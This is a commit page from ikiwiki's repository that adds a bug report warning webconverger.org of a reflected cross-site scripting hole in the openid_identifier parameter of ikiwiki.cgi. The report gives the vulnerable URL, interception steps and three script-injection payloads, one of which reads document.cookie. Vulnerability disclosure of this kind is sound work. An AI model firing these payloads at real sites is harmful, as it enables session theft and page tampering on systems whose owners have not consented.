author:    https://www.google.com/accounts/o8/id?id=AItOawkl0wS6X0mzN8lb-SFh3ajLB-7ezwfwyTw <Raghav@web>  2015-03-24 01:51:44 -0400
committer: admin <admin@branchable.com>  2015-03-24 01:51:44 -0400
commit:    ed200f20391ca9553b0e722f7938aeb2870e2e33 (patch)
tree:      f1abd242635d2edc72cb582119c0d6dc0fc031f3
parent:    ed9228e0b801daedb1a9b1255ac6804a7ffef68a (diff)
download:  ikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar, ikiwiki-ed200f20391ca9553b0e722f7938aeb2870e2e33.tar.gz

-rw-r--r--  doc/bugs/XSS_Alert...__33____33____33__.html  25
1 files changed, 25 insertions, 0 deletions
diff --git a/doc/bugs/XSS_Alert...__33____33____33__.html b/doc/bugs/XSS_Alert...__33____33____33__.html
new file mode 100644
index 000000000..24a1a3af0
--- /dev/null
+++ b/doc/bugs/XSS_Alert...__33____33____33__.html
@@ -0,0 +1,25 @@
+Respected Sir,
+Your website "webconverger.org" is vulnerable to XSS Attack.
+
+Vulnerable Links:
+webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+
+How To Reproduce The Vulnerability :
+1. Go to this link : webconverger.org/ikiwiki.cgi?action=verify&do=signin&openid_identifier=1
+2. refresh the page and intercept the http request using "brup suite" then at parameter "openid_identifier=" put xss payload
+3. forward the request
+
+XSS Payload :
+1. "></script><script>prompt(909043)</script>
+2. "></script><script>prompt("XSS Alert...!!! : Hacked By Raghav Bisht")</script>
+3. "></script><script>prompt(document.cookie)</script>
+
+NOTE : Proof of concept is attached.
+
+
+Thank You...!!
+
+
+Your Faithfully,
+Raghav Bisht
+raghav007bisht@gmail.com